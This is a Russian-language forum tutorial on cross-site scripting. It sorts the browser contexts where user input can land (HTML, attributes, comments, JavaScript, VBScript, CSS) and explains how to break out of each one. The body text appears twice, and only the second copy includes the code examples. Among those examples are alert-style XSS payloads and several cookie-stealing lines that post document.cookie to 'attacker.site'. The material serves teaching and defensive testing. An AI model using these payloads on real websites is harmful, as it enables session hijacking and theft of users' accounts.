K
klobald
Веб-страница – это всего лишь текст, но браузер не смотрит на неё как на монолитный кусок текста, различные разделы страницы могут быть интерпретированы браузером по-разному: как HTML, CSS или JavaScript.
Как слово ключ в зависимости от используемого контектса может означать музыкальный знак, ключ — от двери, ключ — природный источник воды, ключ — гаечный ключ, ключ — регистрационный номер, вводимый для установки платного программного обеспечения; так и то влияние, которое оказывает пользовательский ввод зависит от контекста, в котором браузер пытается интерпретировать пользовательский ввод. Ниже составлен список различных контекстов, в которых пользовательский ввод может возникнуть на странице.
1) Простой HTML контекст
В теле существующего HTML тэга или в начале и в конце страницы вне тэга <html>.
В этом контексте вы можете в пользовательский ввод вписать валидный HTML любого рода и он немедленно будет воспроизведён браузером.
Например:
2) Контекст имени HTML атрибута
Внутри открытого HTML тэга, после имени тэга или после значения атрибута.
В этом контексте вы можете ввести имя обработчика событий и код JavaScript следующий за символом = и мы можем иметь исполняемый код, это можно рассматривать как исполнимый контекст.
Например:
3) Контекст значения HTML атрибута
Внутри открытого HTML тэга, после имени атрибута отделённого символом =.
Есть три вариации этого контекста
a) Атрибуты события
Это такие атрибуты как onclick, onload и т.д. и значения этих атрибутов выполняются как JavaScript. Поэтому всё здесь – это то же самое, что и JavaScript контекст.
b) URL атрибуты
Эти атрибуты принимают URL в качестве значения, например, src атрибут различных тэгов. Ввод JavaScript URL здесь может привести к выполнению JavaScript.
Например:
c) Специальные URL атрибуты
Это URL атрибуты, где ввод обычных URL может привести к проблемам безопасности.
Несколько примеров:
Ввод просто абсолютного http или https URL в этих случаях может оказать эффект на безопасность веб-сайта. В некоторых случаях, если возможно выгружать на сервер контролируемые пользователем данные, тогда даже ввод относительных URL здесь может привести к проблеме. Некоторым сайтам следует очищать http:// и https:// от введённых значений в этих атрибутах для предотвращения вставки здесь абсолютных URL, но есть много способов, которыми могут быть указаны абсолютные URL.
d) Атрибуты тега META
Meta теги, такие как Charset, могут влиять на то, как содержимые страницы интерпретируется браузером. И есть атрибут http-equiv, который может эмулировать поведение заголовков ответа HTTP. Воздействия на значения заголовков вроде Content-Type, Set-Cookie и т.д. будет иметь влияние на безопасность страницы.
e) Обычные атрибуты
Если ввод появляется в значениях обычных атрибутов, то этот контекст должен быть экранирован, чтобы это привело к выполнению кода. Если атрибут в кавычках, то нужно использовать соответствующую кавычку для выхода из контекста. В случае отсутствия в атрибуте кавычек, пробел или обратный слеш должны сделать эту работу. При выходе из контекста можно добавить новый обработчик событий, что приведёт к выполнению кода.
Например:
4) Контекст HTML комментариев
Внутри секции комментариев HTML
Это не исполняемый контекст и требуется выйти из контекста для выполнения кода. Ввод --> завершит этот контекст и переключит весь последующий текст в HTML контекст.
Например:
5) Контекст JavaScript
Внутри раздела страницы JavaScript кода.
Это относится к разделу, заключённому в тэги SCRIPT, в значения атрибутов обработчиков событий и в URL, обрабатывающихся с JavaScript.
Внутри JavaScript пользовательский ввод может появляться в следующих контекстах:
Например:
Если вы не собираетесь переключаться на HTML контекст, тогда вам нужно специально обработать ввод в зависимости от специфичного JavaScript контекста, в котором он появляется.
a) Контекст кода
Это исполняемый контекст, пользовательский ввод напрямую появляется в выражении и вы можете напрямую ввести элементы JavaScript и они будут выполнены.
Например:
b) Контекст строки внутри одинарных кавычек
Это не исполняемый контекст и пользовательский ввод должен включать одинарную кавычку в начале для выхода из контекста строки и перехода в контекст кода.
Например:
c) Контекст строки внутри двойных кавычек
Это не исполняемый контекст и пользовательский ввод должен включать двойную кавычку в начале для выхода из контекста строки и перехода в контекст кода.
Например:
d) Контекст команды в одну строку
Это не исполняемый контекст и пользовательский ввод должен включать символ новой строки для выхода из контекста комментария строки и переключения в контекст кода.
Например:
e) Контекст многострочного комментария
пользовательский_ввод
Это не исполняемый контекст и пользовательский ввод должен включать */ для выхода из контекста многострочного комментария и переключения в контекст кода.
Например:
f) Строка, предназначенная для исполнителей кода
Эти контекст строк заключённых в кавычки или в двойные кавычки, но важно то, что эти строки передаются функциями или назначаются свойствам, которые будут обработаны как исполняемый код.
Вот несколько примеров:
Это должно обрабатываться похожим образом с контекстом кода.
6) Контекст VB Script
В настоящие дни это большая редкость, но всё же вам может встретиться какой-нибудь странный сайт, использующий VBScript.
пользовательский_ввод
Как JavaScript, вы можете переключиться на контекст HTML тэгом </SCRIPT>.
Внутри VBScript пользовательский ввод может появляться в следующих контекстах:
a) Контекст кода
b) Контекст строки внутри одинарных кавычек
c) Контекст строки внутри двойных кавычек
d) Строки, которые отправляются на исполняющий поглотитель
a) Контекст кода
Похоже на JavaScript эквивалент, вы можете напрямую вводить VBScript
b) Контекст строки внутри одинарных кавычек
VBScript имеет только однострочные комментарии и по аналогии с эквивалентом JavaScript ввод символа новой строки позволит выйти из контекста комментариев и переключиться на контекст кода.
c) Контекст строки внутри двойных кавычек
Похоже на JavaScript эквивалент
d) Строки, которые отправляются на исполняющий поглотитель
Похоже на JavaScript эквивалент
7) CSS Context
Внутри раздела CSS кода страницы.
Это относится к разделу, заключённому в теги STYLE, и в значения атрибутов стиля.
Внедрение CSS в страницу само по себе может иметь некоторое воздействие на эту страницу. Например, изменение расположения, видимости, размера и z-index элементов на страницы может сделать для пользователя возможным выполнить действия отличное от предполагаемых.
Но ещё интереснее как JavaScript может быть выполнена внутри CSS. Хотя в современных браузерах это невозможно, более старые поддерживали выполнение JavaScript двумя способами.
i. expression property
expression – это особенность только Internet Explorer, которая позволяла выполнение JavaScript встроенного внутри CSS.
ii. JavaScript URL
Некоторые CSS свойства вроде свойства background-image принимали URL в качестве своих значений. В более старых браузерах вставка здесь JavaScript URL приводила выполнению этого кода JavaScript.
Внутри CSS, пользовательский ввод может появиться в следующих контекстах:
Например:
Если вы не собираетесь переключаться на HTML контекст, тогда вам нужно приготовить ввод в зависимости от CSS контекста, в котором он появляется.
a) Контекст оператора
В этом контексте вы можете начать напрямую внедряя CSS для изменения страницы при атаке социальной инженерией или задействовать свойство выражения или метод JavaScript URL для внедрения кода JavaScript.
b) Контекст строки заключённой в одиночные/двойные кавычки
В начале ввода добавьте одиночную или двойную кавычку, чтобы завершить контекст строки и переключиться в контекст оператора.
c) Контекст многострочного комментария
По аналогии с многострочными комментариями в JavaScript ввод */ прекратит контекст комментария и переключит в контекст оператора.
d) Строки, отправляемые для выполнения
Это строки внутри одинарных или двойных кавычек, которые либо передаются в выражение свойства или в свойство, принимающее URL, например, background-image. В обоих случаях, данные внутри контекста строки могут интерпретироваться браузером как JavaScript код.
Как слово ключ в зависимости от используемого контектса может означать музыкальный знак, ключ — от двери, ключ — природный источник воды, ключ — гаечный ключ, ключ — регистрационный номер, вводимый для установки платного программного обеспечения; так и то влияние, которое оказывает пользовательский ввод зависит от контекста, в котором браузер пытается интерпретировать пользовательский ввод. Ниже составлен список различных контекстов, в которых пользовательский ввод может возникнуть на странице.
1) Простой HTML контекст
В теле существующего HTML тэга или в начале и в конце страницы вне тэга <html>.
Код:
<некий_html_тэг> пользовательский_ввод </некий_html_тэг>В этом контексте вы можете в пользовательский ввод вписать валидный HTML любого рода и он немедленно будет воспроизведён браузером.
Например:
Код:
<img src=x onerror=alert(1)>2) Контекст имени HTML атрибута
Внутри открытого HTML тэга, после имени тэга или после значения атрибута.
Код:
<некий_html_тэг пользовательский_ввод имя_некоего_атрибута="некое_значение_атрибута"/>В этом контексте вы можете ввести имя обработчика событий и код JavaScript следующий за символом = и мы можем иметь исполняемый код, это можно рассматривать как исполнимый контекст.
Например:
Код:
onclick="alert(1)"3) Контекст значения HTML атрибута
Внутри открытого HTML тэга, после имени атрибута отделённого символом =.
Код:
<некий_html_тэг имя_некоего_атрибута="пользовательский_ввод" />
<некий_html_тэг имя_некоего_атрибута='пользовательский_ввод' />
<некий_html_тэг имя_некоего_атрибута=пользовательский_ввод />Есть три вариации этого контекста
- Атрибут внутри двойных кавычек
- Атрибут внутри одинарных кавычек
- Атрибут без кавычек
a) Атрибуты события
Это такие атрибуты как onclick, onload и т.д. и значения этих атрибутов выполняются как JavaScript. Поэтому всё здесь – это то же самое, что и JavaScript контекст.
b) URL атрибуты
Эти атрибуты принимают URL в качестве значения, например, src атрибут различных тэгов. Ввод JavaScript URL здесь может привести к выполнению JavaScript.
Например:
Код:
javascript:some_javascript()c) Специальные URL атрибуты
Это URL атрибуты, где ввод обычных URL может привести к проблемам безопасности.
Несколько примеров:
Код:
<script src="пользовательский_ввод"
<iframe src="пользовательский_ввод"
<frame src="пользовательский_ввод"
<link href="пользовательский_ввод"
<object data="пользовательский_ввод"
<embed src="пользовательский_ввод"
<form action="пользовательский_ввод"
<button formaction="пользовательский_ввод"
<base href="пользовательский_ввод"
<a href="пользовательский_ввод"Ввод просто абсолютного http или https URL в этих случаях может оказать эффект на безопасность веб-сайта. В некоторых случаях, если возможно выгружать на сервер контролируемые пользователем данные, тогда даже ввод относительных URL здесь может привести к проблеме. Некоторым сайтам следует очищать http:// и https:// от введённых значений в этих атрибутах для предотвращения вставки здесь абсолютных URL, но есть много способов, которыми могут быть указаны абсолютные URL.
d) Атрибуты тега META
Meta теги, такие как Charset, могут влиять на то, как содержимые страницы интерпретируется браузером. И есть атрибут http-equiv, который может эмулировать поведение заголовков ответа HTTP. Воздействия на значения заголовков вроде Content-Type, Set-Cookie и т.д. будет иметь влияние на безопасность страницы.
e) Обычные атрибуты
Если ввод появляется в значениях обычных атрибутов, то этот контекст должен быть экранирован, чтобы это привело к выполнению кода. Если атрибут в кавычках, то нужно использовать соответствующую кавычку для выхода из контекста. В случае отсутствия в атрибуте кавычек, пробел или обратный слеш должны сделать эту работу. При выходе из контекста можно добавить новый обработчик событий, что приведёт к выполнению кода.
Например:
Код:
" onclick=alert(1)
' onclick=alert(1)
onclick=alert(1)4) Контекст HTML комментариев
Внутри секции комментариев HTML
Код:
<!-- некий_комментарий пользовательский_ввод некий_комментарий -->Это не исполняемый контекст и требуется выйти из контекста для выполнения кода. Ввод --> завершит этот контекст и переключит весь последующий текст в HTML контекст.
Например:
Код:
--><img src=x onerror=alert(1)>5) Контекст JavaScript
Внутри раздела страницы JavaScript кода.
Код:
<script>
некоторый_javascript
пользовательский_ввод
некоторый_javascript
</script>Это относится к разделу, заключённому в тэги SCRIPT, в значения атрибутов обработчиков событий и в URL, обрабатывающихся с JavaScript.
Внутри JavaScript пользовательский ввод может появляться в следующих контекстах:
- a) Контекст кода
- b) Контекст строки внутри одинарных кавычек
- c) Контекст строки внутри двойных кавычек
- d) Контекст комментария в одну строку
- e) Контекст комментария в несколько строк
- f) Строки, которые отправляются исполняющим поглотителям
Например:
Код:
</script><img src=x onerror=alert(1)>Если вы не собираетесь переключаться на HTML контекст, тогда вам нужно специально обработать ввод в зависимости от специфичного JavaScript контекста, в котором он появляется.
a) Контекст кода
Код:
function dev_func(input) {some_js_code}
dev_func(пользовательский_ввод);
some_variable=123;Это исполняемый контекст, пользовательский ввод напрямую появляется в выражении и вы можете напрямую ввести элементы JavaScript и они будут выполнены.
Например:
Код:
$.post("http://attacker.site", {'cookie':document.cookie}, function(){})//b) Контекст строки внутри одинарных кавычек
Код:
var some_variable='пользовательский_ввод';Это не исполняемый контекст и пользовательский ввод должен включать одинарную кавычку в начале для выхода из контекста строки и перехода в контекст кода.
Например:
Код:
'; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})//c) Контекст строки внутри двойных кавычек
Код:
var some_variable="пользовательский_ввод";Это не исполняемый контекст и пользовательский ввод должен включать двойную кавычку в начале для выхода из контекста строки и перехода в контекст кода.
Например:
Код:
'; $.post("http://attacker.site", {'cookie':document.cookie}, function(){})//d) Контекст команды в одну строку
Код:
some_js_func();//пользовательский_вводЭто не исполняемый контекст и пользовательский ввод должен включать символ новой строки для выхода из контекста комментария строки и переключения в контекст кода.
Например:
Код:
\r\n$.post("http://attacker.site", {'cookie':document.cookie}, function(){})//e) Контекст многострочного комментария
Код:
some_js_func();
/*пользовательский_ввод
Код:
*/
some_js_codeЭто не исполняемый контекст и пользовательский ввод должен включать */ для выхода из контекста многострочного комментария и переключения в контекст кода.
Например:
Код:
*/$.post("http://attacker.site", {'cookie':document.cookie}, function(){})//f) Строка, предназначенная для исполнителей кода
Эти контекст строк заключённых в кавычки или в двойные кавычки, но важно то, что эти строки передаются функциями или назначаются свойствам, которые будут обработаны как исполняемый код.
Вот несколько примеров:
- eval("пользовательский_ввод");
- location = "пользовательский_ввод";
- setTimeout(1000, "пользовательский_ввод");
- x.innerHTML = "пользовательский_ввод";
Это должно обрабатываться похожим образом с контекстом кода.
6) Контекст VB Script
В настоящие дни это большая редкость, но всё же вам может встретиться какой-нибудь странный сайт, использующий VBScript.
Код:
<script language="vbscript" type="text/vbscript">
some_vbscriptпользовательский_ввод
Код:
some_vbscript
</script>Как JavaScript, вы можете переключиться на контекст HTML тэгом </SCRIPT>.
Внутри VBScript пользовательский ввод может появляться в следующих контекстах:
a) Контекст кода
b) Контекст строки внутри одинарных кавычек
c) Контекст строки внутри двойных кавычек
d) Строки, которые отправляются на исполняющий поглотитель
a) Контекст кода
Похоже на JavaScript эквивалент, вы можете напрямую вводить VBScript
b) Контекст строки внутри одинарных кавычек
VBScript имеет только однострочные комментарии и по аналогии с эквивалентом JavaScript ввод символа новой строки позволит выйти из контекста комментариев и переключиться на контекст кода.
c) Контекст строки внутри двойных кавычек
Похоже на JavaScript эквивалент
d) Строки, которые отправляются на исполняющий поглотитель
Похоже на JavaScript эквивалент
7) CSS Context
Внутри раздела CSS кода страницы.
Код:
<style>
some_css
пользовательский_ввод
some_css
</style>Это относится к разделу, заключённому в теги STYLE, и в значения атрибутов стиля.
Внедрение CSS в страницу само по себе может иметь некоторое воздействие на эту страницу. Например, изменение расположения, видимости, размера и z-index элементов на страницы может сделать для пользователя возможным выполнить действия отличное от предполагаемых.
Но ещё интереснее как JavaScript может быть выполнена внутри CSS. Хотя в современных браузерах это невозможно, более старые поддерживали выполнение JavaScript двумя способами.
i. expression property
expression – это особенность только Internet Explorer, которая позволяла выполнение JavaScript встроенного внутри CSS.
Код:
css_selector
{
property_name: expression(some_javascript);
}ii. JavaScript URL
Некоторые CSS свойства вроде свойства background-image принимали URL в качестве своих значений. В более старых браузерах вставка здесь JavaScript URL приводила выполнению этого кода JavaScript.
Код:
css_selector
{
background-image: javascript:some_javascript()
}Внутри CSS, пользовательский ввод может появиться в следующих контекстах:
- a) Контекст оператора
- b) Контекст строки заключённой в одиночные/двойные кавычки
- c) Контекст многострочного комментария
- d) Строки, отправляемые для выполнения
Например:
Код:
</style><img src=x onerror=alert(1)>Если вы не собираетесь переключаться на HTML контекст, тогда вам нужно приготовить ввод в зависимости от CSS контекста, в котором он появляется.
a) Контекст оператора
В этом контексте вы можете начать напрямую внедряя CSS для изменения страницы при атаке социальной инженерией или задействовать свойство выражения или метод JavaScript URL для внедрения кода JavaScript.
b) Контекст строки заключённой в одиночные/двойные кавычки
В начале ввода добавьте одиночную или двойную кавычку, чтобы завершить контекст строки и переключиться в контекст оператора.
c) Контекст многострочного комментария
По аналогии с многострочными комментариями в JavaScript ввод */ прекратит контекст комментария и переключит в контекст оператора.
d) Строки, отправляемые для выполнения
Это строки внутри одинарных или двойных кавычек, которые либо передаются в выражение свойства или в свойство, принимающее URL, например, background-image. В обоих случаях, данные внутри контекста строки могут интерпретироваться браузером как JavaScript код.
